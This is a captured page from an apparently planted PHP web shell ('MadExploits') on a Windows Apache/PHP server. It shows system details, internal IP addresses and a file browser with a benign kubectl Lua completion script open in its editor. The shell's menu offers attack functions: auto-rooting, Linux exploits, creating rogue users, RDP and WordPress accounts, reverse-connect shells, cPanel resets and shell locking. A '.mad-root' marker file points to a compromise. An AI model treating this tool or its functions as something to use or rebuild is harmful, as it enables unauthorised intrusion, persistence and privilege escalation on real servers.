Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
: 172.16.0.66 | : 172.16.0.254
Cant Read [ /etc/named.conf ]
7.3.25
SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ]
[ C ]
[ D ]
C: /
laragon /
bin /
cmder /
vendor /
clink-completions /
[ HOME SHELL ]
Name
Size
Permission
Action
.vscode
[ DIR ]
drwxrwxrwx
modules
[ DIR ]
drwxrwxrwx
spec
[ DIR ]
drwxrwxrwx
.appveyor.yml
616
B
-rw-rw-rw-
.busted
116
B
-rw-rw-rw-
.cmderver
16
B
-rw-rw-rw-
.gitignore
89
B
-rw-rw-rw-
.init.lua
195
B
-rw-rw-rw-
.luacheckrc
206
B
-rw-rw-rw-
.luacov
162
B
-rw-rw-rw-
.mad-root
0
B
-rw-rw-rw-
LICENSE
1.06
KB
-rw-rw-rw-
README.md
2.05
KB
-rw-rw-rw-
RELEASENOTES.md
8.23
KB
-rw-rw-rw-
angular-cli.lua
4.29
KB
-rw-rw-rw-
chocolatey.lua
4.74
KB
-rw-rw-rw-
coho.lua
2.88
KB
-rw-rw-rw-
cordova.lua
2.99
KB
-rw-rw-rw-
dotnet.lua
5.59
KB
-rw-rw-rw-
git.lua
29.43
KB
-rw-rw-rw-
git_prompt.lua
3.25
KB
-rw-rw-rw-
kubectl.lua
1.92
KB
-rw-rw-rw-
net.lua
1.16
KB
-rw-rw-rw-
npm.lua
6.41
KB
-rw-rw-rw-
nvm.lua
1.06
KB
-rw-rw-rw-
pip.lua
5.4
KB
-rw-rw-rw-
pipenv.lua
3.85
KB
-rw-rw-rw-
scoop.lua
7.75
KB
-rw-rw-rw-
ssh.lua
1.02
KB
-rw-rw-rw-
test.bat
48
B
-rwxrwxrwx
vagrant.lua
4.11
KB
-rw-rw-rw-
yarn.lua
4.63
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kubectl.lua
local w = require('tables').wrap local parser = clink.arg.new_parser local function exec_kubectl(arguments, template) local f = io.popen("kubectl "..arguments.." -o template --template=\""..template.."\"") if not f then return w({}) end local output = f:read('*all') f:close() local res = w({}) for element in output:gmatch("%S+") do table.insert(res, element) end return res end local function get_config(config) return exec_kubectl("config view", "{{ range ."..config.." }}{{ .name }} {{ end }}") end local function get_config_func(config) return function() return get_config(config) end end local function get_resources(noun) return exec_kubectl("get "..noun, "{{ range .items }}{{ .metadata.name }} {{ end }}") end local function get_resources_func(noun) return function() return get_resources(noun) end end local resource_parser = parser( { "all" .. parser({get_resources_func("all")}), "node" .. parser({get_resources_func("node")}), "service" .. parser({get_resources_func("service")}), "pod" .. parser({get_resources_func("pod")}), "deployment" .. parser({get_resources_func("deployment")}) } ) local scale_parser = parser( { "deployment" .. parser({get_resources_func("deployment")}, parser({"--replicas"})) } ) local config_parser = parser( { "current-context", "delete-cluster", "delete-context", "get-clusters", "get-contexts", "rename-context", "set", "set-cluster", "set-context", "set-credentials", "unset", "use-context" .. parser({get_config_func("contexts")}), "view" } ) local kubectl_parser = parser( { "apply", "exec" .. parser({get_resources_func("pod")}, parser({ "-it"})), "get" .. resource_parser, "describe" .. resource_parser, "logs" .. parser({get_resources_func("pod")}), "port-forward" .. parser({get_resources_func("pod")}), "scale" .. scale_parser, "config" .. config_parser } ) clink.arg.register_parser("kubectl", kubectl_parser)
Close